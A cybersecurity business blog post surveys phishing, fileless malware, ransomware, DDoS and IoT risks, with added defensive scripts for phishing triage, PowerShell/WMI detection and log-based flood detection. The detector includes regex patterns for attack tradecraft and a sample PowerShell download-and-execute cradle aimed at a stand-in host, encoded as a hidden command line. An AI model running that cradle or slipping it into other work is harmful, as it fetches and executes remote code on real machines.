Businesses now face a multitude of cybersecurity threats, and they rank among the most serious risks an organization carries. Market analysts from Juniper Research suggest that global cybercrime will cost businesses more than $2.1 trillion by 2019. Not only is money at stake but also brand reputation and customer loyalty. Just look at recent cyberattacks on enterprise organizations like Equifax, Uber, Target, Home Depot, and many others. If you operate a small or mid-size business, the outlook could be even worse. SMBs are becoming a big target for cybercriminals as enterprise organizations strengthen their defenses.
Regardless of the size of your organization, it’s important to be aware of the top cybersecurity threats emerging and threatening all businesses. In this blog, you will learn more about the top cybersecurity risks that many organizations now face and ways to mitigate them.
Spear Phishing/Smishing/Vishing/Whaling Scams
Astonishingly, four out of ten end users still cannot identify whether an email message is fake and simply guess whether its content is real or malicious. Moreover, 91% of cyberattacks start with a phishing email. Cybercriminals use social engineering tactics to gain access to your organization’s data and wreak havoc on your business. Most end users open phishing emails out of curiosity, fear, or urgency.
Cybercriminals often study the behavior of their victims and their circle of influence in order to craft even more sophisticated social engineering tactics. Are you familiar with the following phishing schemes?
- Spear Phishing – A phishing attempt that targets a select group of users or business departments. To execute spear phishing, a cybercriminal thoroughly studies a group of end users to understand their online behaviors and their circle of influence in professional and social networks, a process known as social engineering. The resulting fake message uses graphics and content that increase its relevance and credibility.
- Smishing – SMS phishing, or “smishing”, uses SMS messages to deliver fake URLs to the user. Taking advantage of the growing use of smart devices, the attacker relies on the victim inadvertently tapping the fake URL and landing on a data collection site, where their identity is stolen right out of the palm of their hand.
- Vishing – This is an abbreviation for Voice Phishing, where the victim is induced to make a call to the criminal who then simulates, for example, a customer service center and gains access to the victim’s data over the phone.
- Whaling – In this social engineering tactic, a cybercriminal targets the Chief Executive Officer or other high-profile executives within the company to exfiltrate highly sensitive data.
To mitigate these various phishing attempts, your organization should regularly perform phishing simulations and security awareness training so that employees know how to discern a real email from a phishing attempt. Also, employees should be encouraged to report any phishing email threats directly to their IT security team. Doing so has been proven to reduce the Mean Time to Detect.
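When employees do report suspicious messages, the security team needs a quick first pass over the pile. The script below is an added example, not part of the original post: it applies three simple spear phishing and whaling heuristics (a sender domain that looks like the company’s but is not, an executive’s name on an external address, and a reply-to that points somewhere else) to constructed reports; the organisation domain, executive list and messages are all made up for the demonstration.

```python
"""Triage heuristics for employee-reported phishing emails.

Added example, not from the original post. The organisation domain,
executive names and every sample message are constructed for the demo.
"""
from difflib import SequenceMatcher

ORG_DOMAIN = "example.com"                 # constructed
EXECUTIVES = {"jane doe", "john roe"}      # constructed, lower-cased

def domain_of(address: str) -> str:
    """Lower-cased domain part of an email address."""
    return address.rsplit("@", 1)[-1].lower()

def lookalike(domain: str, threshold: float = 0.8) -> bool:
    """True when domain resembles ORG_DOMAIN without being equal to it."""
    if domain == ORG_DOMAIN:
        return False
    return SequenceMatcher(None, domain, ORG_DOMAIN).ratio() >= threshold

def triage(msg: dict) -> list:
    """Reasons a reported message looks like spear phishing or whaling."""
    reasons = []
    sender = domain_of(msg["from_addr"])
    if lookalike(sender):
        reasons.append("lookalike sender domain")
    # Whaling: an executive's name shown on a message from outside the org
    if msg["display_name"].lower() in EXECUTIVES and sender != ORG_DOMAIN:
        reasons.append("executive name on external domain")
    reply_to = msg.get("reply_to")
    if reply_to and domain_of(reply_to) != sender:
        reasons.append("reply-to domain differs from sender domain")
    return reasons

# Constructed reports such as a security team might receive.
REPORTED = [
    {"display_name": "Jane Doe", "from_addr": "jane.doe@examp1e.com",
     "reply_to": "payments@mailbox.invalid"},
    {"display_name": "Bob", "from_addr": "bob@example.com"},
]

if __name__ == "__main__":
    for msg in REPORTED:
        print(msg["from_addr"], "->", triage(msg) or ["no findings"])
```

The similarity threshold is a starting point; a real deployment would also check registered lookalike domains and the authenticated sender (SPF/DKIM results) rather than the display header alone.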
Malware and Advanced Persistent Threats
Malware is a common cybersecurity threat that cybercriminals use to infect devices and networks. Viruses, Trojans, and other malicious software are often used for financial gain and power. Malware usually goes undetected on the network and will attempt to steal as much data as possible without leaving any trace of its activity.
Hackers have developed a newer type of malware, called “fileless” or memory-based malware, which is becoming a major security challenge. Unlike traditional malware, fileless malware does not use or write any files. Instead, the malicious code is injected into RAM or the registry. It often flies under the radar of traditional anti-malware software because it can take advantage of a web browser or Office application vulnerability. Fileless malware can be built from scripts, such as PowerShell or Windows Management Instrumentation (WMI), to infect a device.
To mitigate the latest malware threats, it’s important to have both traditional and next-generation antivirus (NGAV or Next-Gen AV) products in place. Traditional anti-virus is the most prevalent solution for protecting your organization against known malware. For new malware and zero-day exploits, however, next-generation anti-virus monitors device behavior and identifies anomalous activity without querying a signature database. Next-gen AV can protect your endpoints from zero-day exploits by monitoring them in real time; traditional anti-virus does not scan in real time.
Ransomware dominated the news headlines in 2016 and 2017. Ransomware families like Locky, WannaCry, and Petya/NotPetya caused more than 4,000 businesses and individuals every day to lose productivity and their data. Ransomware is malware that blocks a user’s access to a device or data until a ransom is paid: it encrypts the user’s device or data and essentially locks them out.
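Because fileless malware leaves no file for a signature scanner, the behavioral telemetry that next-gen AV relies on is what exposes it: command lines that run PowerShell with an encoded payload, a hidden window, an in-memory download, or a process spawned through WMI. The script below is an added example, not from the original post: it decodes -EncodedCommand payloads and flags those traits over constructed process-creation log lines (all samples, including the example.invalid URL, are made up).

```python
"""Flag PowerShell and WMI command lines with fileless-malware traits.

Added example, not from the original post. Log lines are constructed;
real input would be process-creation or script block logging. Admins use
these switches legitimately too, so matches are leads, not verdicts.
"""
import base64
import re

ENCODED = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.I)

# Traits the post associates with fileless tradecraft: scripts executed
# in memory rather than a malicious file written to disk.
PATTERNS = {
    "encoded command": ENCODED,
    "hidden window / no profile":
        re.compile(r"-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?)", re.I),
    "download-and-execute in memory": re.compile(
        r"(?:iex|invoke-expression).*(?:downloadstring|webclient)"
        r"|(?:downloadstring|webclient).*(?:iex|invoke-expression)", re.I),
    "wmi process creation": re.compile(
        r"wmic.*process\s+call\s+create|win32_process.*create", re.I),
}

def decode_encoded_command(cmdline: str) -> str:
    """Decode a -EncodedCommand payload (base64 of UTF-16LE) or return ''."""
    m = ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""

def classify(cmdline: str) -> list:
    """Names of every trait found in the command line and decoded payload."""
    text = cmdline + " " + decode_encoded_command(cmdline)
    return [name for name, rx in PATTERNS.items() if rx.search(text)]

# Constructed samples: a download cradle hidden in an encoded command,
# a WMI-spawned shell, and an ordinary scheduled script for contrast.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
SAMPLE_LOGS = [
    "powershell.exe -nop -w hidden -enc "
    + base64.b64encode(PAYLOAD.encode("utf-16-le")).decode(),
    'wmic.exe process call create "powershell -nop -c Get-Date"',
    "powershell.exe -File C:\\scripts\\backup.ps1",
]
RESULTS = {line[:40]: classify(line) for line in SAMPLE_LOGS}
```

Decoding the payload before matching is the important step: the download cradle in the first sample is invisible to a plain string match on the raw command line.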
The unfortunate landscape is that more than 75% of organizations that are targeted by ransomware still do not have a security solution or strategies in place to prevent these incidents. As a security practitioner, you can take various steps to mitigate ransomware, including:
- Phishing training – we learned from above that phishing is the most common tactic for malware and ransomware delivery
- Back up your data – the only way to recover your data is to have a secure backup solution in place in the event of a successful ransomware attack
- Patch management – patching is an often overlooked process that reduces your vulnerabilities. The problem is that so many patches are issued that IT departments have a tough time keeping up.
Ransomware attacks can be mitigated with information security best practices. Implementing them puts up a layered defense in your security program.
Distributed Denial of Service (DDoS) Attacks
DDoS attacks have increased dramatically over the last two years. On October 21, 2016, many DNS providers in the United States were hit by DDoS attacks, which left many organizations with significant downtime. Distributed denial of service (DDoS) attacks are now a big threat to any business with a web presence. No matter what size business you operate, it could be just a matter of time before you deal with a DDoS attack. Here are three types of DDoS attack methods:
- Network-level – attackers disrupt the connection of your network, website, or online service to the Internet. They send huge amounts of traffic to overwhelm your network connection capacity until systems become unavailable.
- Protocol attacks – firewall and load balancer resources are consumed by the DDoS attacker or the DDoS bots used in the attack.
- Application level – attackers overload application resources in an attempt to crash a web application completely and bring the website down.
To mitigate these attack types, you should have adequate defenses already in place and, most importantly, a strong DDoS playbook. Your DDoS playbook outlines a complete strategy for DDoS mitigation, from identifying an attack, to responding to a DDoS ransom demand, to the technology used to detect a DDoS attack.
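The detection step of a playbook needs something concrete to act on. As an added example, not part of the original post, the script below spots an application-level flood in web server access logs by counting requests per source address inside a sliding window; the log lines, the 10-second window and the 50-request threshold are constructed for illustration and would be tuned to a site’s normal traffic.

```python
"""Application-level flood detection over web server access logs.

Added example, not from the original post. Log lines are constructed in
Common Log Format; the window and threshold are illustrative and would
be tuned to a site's normal traffic before going into a DDoS playbook.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW_SECONDS = 10   # length of the sliding window per source address
MAX_REQUESTS = 50     # requests inside the window before a source is flagged
CLF_TIME = "%d/%b/%Y:%H:%M:%S %z"

def parse(line: str):
    """Return (source_ip, timestamp) from a Common Log Format line."""
    ip, rest = line.split(" ", 1)
    stamp = rest[rest.index("[") + 1 : rest.index("]")]
    return ip, datetime.strptime(stamp, CLF_TIME)

def flag_floods(lines):
    """Map each flooding source to the time its rate first crossed the limit."""
    recent = defaultdict(deque)   # per-source timestamps inside the window
    alerts = {}
    for line in lines:
        ip, ts = parse(line)
        window = recent[ip]
        window.append(ts)
        while (ts - window[0]).total_seconds() > WINDOW_SECONDS:
            window.popleft()  # expire requests older than the window
        if len(window) > MAX_REQUESTS and ip not in alerts:
            alerts[ip] = ts
    return alerts

def constructed_log():
    """Constructed sample: one aggressive client hitting a search endpoint
    at about 12 requests per second, mixed with a few normal visitors."""
    base = datetime.strptime("01/Jan/2018:13:00:00 +0000", CLF_TIME)
    lines = []
    for i in range(120):
        t = (base + timedelta(seconds=i // 12)).strftime(CLF_TIME)
        lines.append(f'203.0.113.7 - - [{t}] "GET /search?q={i} HTTP/1.1" 200 512')
        if i % 30 == 0:   # an ordinary visitor every 30 flood requests
            lines.append(f'198.51.100.{i // 30 + 1} - - [{t}] "GET / HTTP/1.1" 200 2048')
    return lines

if __name__ == "__main__":
    for ip, when in flag_floods(constructed_log()).items():
        print(f"{ip} exceeded {MAX_REQUESTS} requests/{WINDOW_SECONDS}s at {when}")
```

A per-address counter catches a single noisy client; a distributed flood spreads across many addresses, so the same window logic is also worth running per target path and for the site as a whole.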
Internet of Things
There’s unprecedented growth in the Internet of Things (IoT) space. Connected devices now touch every aspect of everyday life, from fitness and cars to health monitoring and industrial control systems. But every new IoT device that connects online adds even more complexity and security challenges for an organization. Moreover, Bring Your Own Device (BYOD) policies also bring highly vulnerable IoT devices onto the network. Many IoT devices are not engineered with Security by Design and are rushed to market without a plan for regular firmware updates to patch vulnerabilities.
To mitigate IoT vulnerabilities, organizations should inventory all assets on the network and even consider mandating that any BYOD device connect to a guest wireless network. In addition, organizations may want to invest in a discovery tool that monitors networks, detects unknown devices, and disconnects them from the network if they have critical vulnerabilities.
How to Mitigate the Top Cybersecurity Threats
Your business can encounter many different forms of cybersecurity threats. It’s important to start building information security best practices and policies, educate your users, and invest in security technology solutions that complement your cybersecurity strategy. If you build a layered, Defense-in-Depth approach to your security, you will be in a much better position to lower your Mean Time to Detect and Mean Time to Respond.